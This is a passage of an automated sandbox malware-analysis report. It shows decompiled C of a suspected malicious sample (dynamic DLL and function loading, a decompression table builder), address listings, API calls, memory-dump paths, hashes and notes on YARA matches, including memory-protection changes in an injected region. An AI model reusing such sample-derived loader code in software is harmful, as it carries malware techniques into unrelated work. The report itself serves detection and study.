						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B82CB9 Relevance: 3.2, Strings: 2, Instructions: 706COMMON

Download Yara Rule

Strings

MG, xrefs: 02B8361D
_\8R, xrefs: 02B834AA

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: MG$_\8R
API String ID: 2706961497-2440753728
Opcode ID: 06c5ebf70fac01618f9a258c384bd0624a98622fa708c1474c3d8ee612cd27a3
Instruction ID: c933d56e1dfc363ca857a30dba4a7df6b53abd89bf7c40e5a1a1772e89fda30f
Opcode Fuzzy Hash: 06c5ebf70fac01618f9a258c384bd0624a98622fa708c1474c3d8ee612cd27a3
Instruction Fuzzy Hash: 3D522970A043858FDF35DE38C8A87DA7BD2AF56360F4982AECC998F196D3358546C712

Uniqueness

Uniqueness Score: -1.00%

Function 02B821BC Relevance: 3.0, Strings: 2, Instructions: 498COMMON

Download Yara Rule

Strings

S, xrefs: 02B824A0
I, xrefs: 02B8258D

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: I$S
API String ID: 0-2206240437
Opcode ID: 27fc15ef930a1f12500d355c2ed0f42c217d5325a9b21c54231d8bf2cf64e4a4
Instruction ID: 3c41331fbc21de697cd73afc6dca51cb47a23b0c6fc63bcea568bd7e51b000dd
Opcode Fuzzy Hash: 27fc15ef930a1f12500d355c2ed0f42c217d5325a9b21c54231d8bf2cf64e4a4
Instruction Fuzzy Hash: BDF17A79A047C6DFDF34AE3884A53EA37E2EF62350F898169CCC99B545D7309982C742

Uniqueness

Uniqueness Score: -1.00%

Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004072B4(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				intOrPtr _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432170 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432170;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t65 =  &_a28; // 0x432170
								_t283 = _t282 - 1;
								_t200 =  *_t65 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									_t74 =  &_a28; // 0x432170
									if(_t296 >  *_t74) {
										_t75 =  &_a28; // 0x432170
										_t296 =  *_t75;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_t98 =  &_a28; // 0x432170
										_a5 =  *_t98;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t107 =  &_a28; // 0x432170
									_t225 = _t224 +  *_t107;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t111 =  &_v36; // 0x432170
								_t284 =  *_t111;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432170 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t65 =  &_a28; // 0x432170
										_t283 = _t282 - 1;
										_t200 =  *_t65 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x004072bf
0x004072c7
0x004072cb
0x004072cd
0x004072d0
0x004072d2
0x004072d2
0x004072d4
0x004072db
0x004072dd
0x004072dd
0x004072e3
0x004072f8
0x00407300
0x00407302
0x00407304
0x00407307
0x00407308
0x00407308
0x0040730e
0x00000000
0x00000000
0x00407310
0x00407313
0x00000000
0x00000000
0x00000000
0x00407313
0x00407317
0x0040731a
0x0040731c
0x0040731c
0x0040731f
0x00407325
0x00407326
0x00000000
0x00000000
0x00000000
0x00407326
0x0040732b
0x0040732e
0x00407330
0x00407330
0x00407336
0x00407338
0x00407349
0x0040733c
0x00407340
0x004075e5
0x00000000
0x004075e5
0x00407346
0x00407347
0x00407347
0x0040734f
0x00407352
0x00407356
0x00407358
0x0040735a
0x0040735d
0x00000000
0x00000000
0x00407365
0x0040736b
0x0040736d
0x0040736f
0x00407370
0x00407385
0x00407385
0x00407388
0x0040738a
0x0040738a
0x0040738c
0x00407391
0x00407393
0x0040739a
0x0040739c
0x004073a4
0x004073a4
0x004073a6
0x004073a7
0x004073b6
0x004073ba
0x004073be
0x004073c1
0x004073c4
0x004073c9
0x004073cc
0x004073d2
0x004073d9
0x004073df
0x004075d8
0x004075d8
0x004075dd
0x004075ec
0x00000000
0x00000000
0x00000000
0x004075dd
0x004073ec
0x004073ef
0x004073f2
0x004073f5
0x004073f9
0x00000000
0x00000000
0x00407404
0x00407404
0x00407407
0x00407408
0x0040740a
0x00407410
0x00407413
0x00000000
0x00000000
0x00407419
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00407429
0x0040742b
0x0040742b
0x0040742b
0x00407433
0x00407437
0x0040743c
0x00407461
0x00407467
0x00407469
0x0040746b
0x0040746e
0x00407477
0x00000000
0x00000000
0x0040743e
0x0040743e
0x00407447
0x0040744b
0x00000000
0x00000000
0x0040745c
0x0040745c
0x0040745f
0x00000000
0x00000000
0x0040744f
0x00407452
0x00407454
0x00407458
0x00000000
0x00000000
0x0040745a
0x0040745a
0x00000000
0x0040745c
0x00407480
0x00407486
0x00407490
0x00407492
0x00407497
0x00407499
0x004074cf
0x0040749b
0x0040749b
0x0040749e
0x004074a1
0x004074a8
0x004074ab
0x004074ae
0x004074b5
0x004074c0
0x004074c7
0x004074c7
0x004074d1
0x004074d4
0x004074d6
0x004074d6
0x004074dc
0x004074dc
0x004074e5
0x004074e8
0x004074e8
0x004074ed
0x004074fc
0x00407504
0x00407509
0x0040752d
0x00407535
0x00407539
0x0040753f
0x0040750b
0x00407519
0x0040751c
0x00407522
0x00407522
0x00407543
0x004074fe
0x004074fe
0x004074fe
0x00407554
0x00407558
0x00407564
0x0040755f
0x00407562
0x00407562
0x0040756c
0x00407571
0x00407579
0x00407575
0x00407577
0x00407577
0x0040757f
0x00407581
0x00407588
0x00407592
0x0040759c
0x004075b8
0x004075bc
0x00407401
0x00407404
0x00407407
0x00407408
0x0040740a
0x00407410
0x00407413
0x00000000
0x00000000
0x00000000
0x00407413
0x00000000
0x00000000
0x00000000
0x00000000
0x0040759e
0x0040759e
0x0040759e
0x004075a3
0x004075ac
0x004075b5
0x00000000
0x004075b5
0x004075c2
0x004075c2
0x004075c5
0x004075cc
0x004075cf
0x00000000
0x004073f2
0x00407372
0x00407374
0x00407374
0x00407378
0x0040737b
0x0040737c
0x0040737c
0x00000000
0x00407374
0x004072e8
0x004072ee
0x00000000

Strings

p!C, xrefs: 004074E8
p!C, xrefs: 00407404, 00407426, 004074D6, 004074A8, 0040742B

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
